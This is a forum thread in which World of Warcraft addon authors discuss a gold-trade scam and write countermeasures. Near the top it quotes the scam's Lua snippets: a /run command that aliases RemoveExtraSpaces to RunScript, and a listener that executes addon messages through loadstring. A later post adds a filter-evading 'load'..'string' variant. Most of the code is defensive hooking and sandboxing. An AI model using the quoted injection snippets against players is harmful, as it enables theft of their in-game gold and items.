WoWInterface

WoWInterface (https://www.wowinterface.com/forums/index.php)
-   General Authoring Discussion (https://www.wowinterface.com/forums/forumdisplay.php?f=20)
-   -   AcceptTrade gold scamming, catching hardware events (https://www.wowinterface.com/forums/showthread.php?t=53881)

Ketho 07-13-16 11:38 PM
AcceptTrade gold scamming, catching hardware events
 
There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?

https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941

Run by the victim
Code:
/run RemoveExtraSpaces = RunScript
Whispered to victim
Code:
local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")
Addon channel
Code:
SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))

I tried thinking of a few possible counter measures:
  • Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
    Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()
  • Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead

So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player :(

But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.

http://forums.wowace.com/showthread.php?t=20110


Lua Code:
  1. local addonName = ...
  2. local f = CreateFrame("Frame")
  3. local db
  4.  
  5. local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
  6. local msg_warn = msg..".\n\nClick anywhere to /reload."
  7. local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."
  8.  
  9. StaticPopupDialogs.SAFETRADE_WARNING = {
  10.     text = "%s",
  11.     button1 = OKAY,
  12.     exclusive = 1, whileDead = 1, showAlert = 1,
  13. }
  14.  
  15. function f:OnEvent(event, addon)
  16.     if addon == addonName then
  17.         SafeTradeDB = SafeTradeDB or {}
  18.         db = SafeTradeDB -- init savedvars
  19.         if db.warning then
  20.             StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
  21.             db.warning = nil
  22.         end
  23.         self:SetHook("RunScript")
  24.     
  25.     elseif addon == "Blizzard_DebugTools" then
  26.         self:SetHook("DevTools_DumpCommand")
  27.     end
  28. end
  29.  
  30. function f:SetHook(func)
  31.     hooksecurefunc(func, function()
  32.         if _G[func] == RemoveExtraSpaces then
  33.             -- reload asap, they cant be that fast ... right?
  34.             db.warning = "RemoveExtraSpaces"
  35.             StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
  36.             self:CatchHW()
  37.         end
  38.     end)
  39. end
  40.  
  41. local btn
  42.  
  43. function f:CatchHW()
  44.     if not btn then
  45.         btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
  46.         btn:SetAllPoints(UIParent)
  47.         btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
  48.         btn:SetAttribute("macrotext", "/reload")
  49.         --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?
  50.         
  51.         btn:SetFrameStrata("TOOLTIP")
  52.         btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
  53.     end
  54. end
  55.  
  56. f:RegisterEvent("ADDON_LOADED")
  57. f:SetScript("OnEvent", f.OnEvent)

myrroddin 07-13-16 11:58 PM
Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?

Or, if you want to be evil, send that same message back to the source, and scam the scammer?

Ketho 07-14-16 12:18 AM
Quote:
Originally Posted by myrroddin (Post 316387)
Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?

That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious :)
Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char

myrroddin 07-14-16 07:02 AM
Yes, during the check/exit phase, you can unregister the prefix. While there is no direct API either natively or with Ace3, I would presume registering "" would do the trick. Wrap it within an if/then so you don't accidentally re-register something you'd want! ;)

While true, the scammer could use a compromised character (of any level), the social hack indicates the scammer would be max level. Afterall, who'd join a raid group for the moose, if you were being invited by someone level 1-99?

As for hacking the hacker, why not? If the message is the scam, then send the scam right back to the hacker. And if the toon has been compromised, the true owner will get fixed up by Blizzard's customer support.

I don't see any issues with this, but I'm evil.

Lombra 07-14-16 08:45 AM
Why would the scammer themself be listening for incoming addon messages?

AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?

Resike 07-14-16 02:00 PM
Quote:
Originally Posted by Ketho (Post 316389)
That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious :)
Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char
Wouln't work the "CHAT_MSG_ADDON" event gets executed in some kinda order and if the malware is faster then you're still fucked.

Kanegasi 07-14-16 03:37 PM
What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.

Ketho 07-14-16 05:17 PM
Quote:
Originally Posted by Lombra (Post 316398)
AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?

Yes, they are being tricked into executing that by catching any hardware events with a secure frame
I don't know how exactly they do that, but I could only manage catching any left-clicks

Quote:
Originally Posted by Kanegasi (Post 316408)
What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.

Good idea. Or maybe without wiping the global one to nil, to not break any other Trade UI related addons.
Lua Code:
  1. local oldAcceptTrade = AcceptTrade
  2.  
  3. function AcceptTrade()
  4.     if RunScript ~= RemoveExtraSpaces then
  5.         oldAcceptTrade()
  6.     end
  7. end
  8.  
  9. TradeFrameTradeButton:SetScript("OnClick", AcceptTrade)

It might be really obvious, but why is RemoveExtraSpaces not a local scope function :confused: It's only being used in ChatFrame.lua

@Resike: So there is no way to stop an addon message before it already has done the damage?


Edit: It looks like Blizzard is already checking for any suspicious whisper messages?



It's not possible to say "loadstring" anymore in chat channels, including whisper

But they could still whisper something like
Lua Code:
  1. pcall(_G["load".."string"](msg))

Resike 07-14-16 06:38 PM
Quote:
Originally Posted by Ketho (Post 316410)
@Resike: So there is no way to stop an addon message before it already has done the damage?
I'm not sure how does it works, it could be served alphabetically or based on time when the event is registered or a combination of this two, it even could be serving faster/smaller functions first and the bigger ones later. It's specially hard to reverse engineer it if the code does't comes from an addon but from a in-game script.

SDPhantom 07-15-16 10:40 AM
When it comes to the chat system, there are many attack vectors they can eventually move to with ease. One thing that can be done is completely nullify the RunScript() and DevTools_DumpCommand() functions while a chat event is being handled.

Lua Code:
  1. local FuncList={
  2.     "RunScript";
  3.     "DevTools_DumpCommand";
  4. };
  5.  
  6. local FuncCache={};
  7. for k,v in ipairs(FuncList) do FuncCache[v]=_G[v]; end
  8.  
  9. local function DummyFunc() end
  10. local OldHandler=ChatFrame_OnEvent;
  11. local InChatEvent=false;
  12.  
  13. local EventFrame=CreateFrame("Frame");
  14. EventFrame:RegisterEvent("ADDON_LOADED");
  15. EventFrame:SetScript("OnEvent",function()
  16.     for k,v in ipairs(FuncList) do
  17.         if not FuncCache[v] then
  18.             FuncCache[v]=_G[v];
  19.             if InChatEvent then _G[v]=DummyFunc; end
  20.         end
  21.     end
  22. end);
  23.  
  24. function ChatFrame_OnEvent(...)
  25.     for k,v in pairs(FuncCache) do _G[k]=DummyFunc; end
  26.     InChatEvent=true;
  27.     OldHandler(...);
  28.     InChatEvent=false;
  29.     for k,v in pairs(FuncCache) do _G[k]=v; end
  30. end

To protect more functions, add them to the FuncList table.


All times are GMT -6. The time now is 12:54 PM.

vBulletin © 2024, Jelsoft Enterprises Ltd
© 2004 - 2022 MMOUI